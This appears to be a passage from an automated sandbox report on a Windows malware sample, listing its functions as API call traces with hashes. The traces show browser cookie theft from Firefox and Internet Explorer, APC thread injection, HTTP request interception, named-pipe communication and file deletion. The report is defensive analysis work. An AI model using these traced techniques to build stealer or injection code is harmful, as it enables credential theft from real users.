  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
